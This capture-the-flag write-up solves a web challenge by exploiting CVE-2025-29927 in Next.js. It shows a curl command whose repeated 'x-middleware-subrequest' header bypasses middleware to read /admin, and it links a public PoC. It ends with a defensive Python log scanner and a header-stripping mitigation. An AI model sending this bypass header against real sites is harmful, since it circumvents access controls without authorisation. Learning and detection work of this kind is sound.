web

This web series was easy enough: I got one, my teammate got one.

waterloo trivia dash

Test your knowledge about Waterloo with this fun trivia game! Complete the quiz to unlock the prize page and claim your reward. http://challs.watctf.org:3080/

Although it did take me a fat minute to realize, I had already done a similar challenge in the past... so this is a freebie after checking the version of Next.js through Wappalyzer.

tldr;

A Next.js app with middleware protecting /admin. CVE-2025-29927 lets you bypass middleware by sending an internal subrequest via the header x-middleware-subrequest with the value src/middleware repeated. I used the public PoC to scan endpoints and found /admin and /admin/login were indeed vulnerable.

Requesting /admin with the bypass header returned the flag.

❯ curl -sSL --compressed 'http://challs.watctf.org:3080/admin' \
    -H 'x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware' \
    | strings | grep -oE 'watctf\{[^}]+\}'
watctf{next_js_middleware_is_cool}

Flag — watctf{next_js_middleware_is_cool}

Reference

  • The crafted header makes Next.js treat the request like an internal middleware subrequest. Combined with RSC/Next headers, this causes the middleware to be skipped or misapplied, exposing protected routes.

    • PoC: https://github.com/websecnl/CVE-2025-29927-PoC-Exploit
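The tl;dr and the reference bullet above both come down to one thing: a header that Next.js only expects on its own internal subrequests being accepted from the internet. The block below is my own added example, not code from the writeup or from the PoC repository, showing the two defender-side pieces that follow from that: a scanner that flags external requests carrying x-middleware-subrequest in an access log (the JSON-per-line log format and the sample records are constructed for this example), and the edge-proxy step of dropping that header before it ever reaches the app. The regex assumes the value shape the PoC uses (the middleware path repeated, colon-separated); any other value still gets flagged, just at lower severity.

```python
"""Defender-side checks for the x-middleware-subrequest bypass (CVE-2025-29927).

  1. scan_access_log(): flags requests that carry the x-middleware-subrequest
     header from an external client; a real browser never sends it.
  2. strip_untrusted_headers(): the edge-proxy side of the fix, dropping the
     header before the request reaches Next.js.

The log format and header values below are constructed for this example.
"""
import json
import re
from typing import Dict, Iterable, List, Optional

# Header the bypass abuses; Next.js only expects it on its own internal subrequests.
BYPASS_HEADER = "x-middleware-subrequest"

# Value shape used by the public PoC: the middleware path repeated, colon-separated.
# Assumption: only the "middleware" / "src/middleware" spellings are matched here.
REPEATED_MIDDLEWARE = re.compile(r"^(?:src/)?middleware(?::(?:src/)?middleware)+$")

# Constructed sample log: one JSON record per line, as an edge proxy might write them.
SAMPLE_LOG = """
{"ts":"2025-03-24T10:00:01Z","src":"203.0.113.7","method":"GET","path":"/","headers":{"user-agent":"Mozilla/5.0"}}
{"ts":"2025-03-24T10:00:02Z","src":"203.0.113.7","method":"GET","path":"/admin","headers":{"user-agent":"curl/8.5.0","x-middleware-subrequest":"src/middleware:src/middleware:src/middleware:src/middleware:src/middleware"}}
{"ts":"2025-03-24T10:00:03Z","src":"198.51.100.9","method":"GET","path":"/admin/login","headers":{"x-middleware-subrequest":"middleware:middleware"}}
{"ts":"2025-03-24T10:00:04Z","src":"198.51.100.9","method":"GET","path":"/api/health","headers":{"x-middleware-subrequest":"something-else"}}
"""


def classify(record: dict) -> Optional[str]:
    """Return a severity label if the record looks like a bypass attempt, else None."""
    headers = {k.lower(): v for k, v in record.get("headers", {}).items()}
    value = headers.get(BYPASS_HEADER)
    if value is None:
        return None
    # Any external request carrying the header is suspicious; the repeated
    # middleware pattern is the exact shape of the public exploit.
    if REPEATED_MIDDLEWARE.match(value):
        return "high"
    return "medium"


def scan_access_log(lines: Iterable[str]) -> List[Dict]:
    """Parse JSON-per-line records and return a finding for each suspicious one."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            continue  # a malformed line must not abort the whole scan
        severity = classify(record)
        if severity:
            findings.append({
                "ts": record.get("ts"),
                "src": record.get("src"),
                "path": record.get("path"),
                "severity": severity,
            })
    return findings


# Headers a proxy should never forward from the internet into a Next.js app.
INTERNAL_ONLY_HEADERS = {BYPASS_HEADER}


def strip_untrusted_headers(headers: Dict[str, str]) -> Dict[str, str]:
    """Edge-proxy mitigation: drop internal-only headers from inbound requests (case-insensitive)."""
    return {k: v for k, v in headers.items() if k.lower() not in INTERNAL_ONLY_HEADERS}


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG.splitlines()):
        print(finding)
    print(strip_untrusted_headers({"Host": "app.example", "X-Middleware-Subrequest": "src/middleware"}))
```

Stripping the header at the proxy is the stop-gap; the actual fix is upgrading to a patched Next.js release. The scanner is meant to run over historical logs as well, since a successful bypass leaves no error on the app side and only the presence of the header gives it away.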
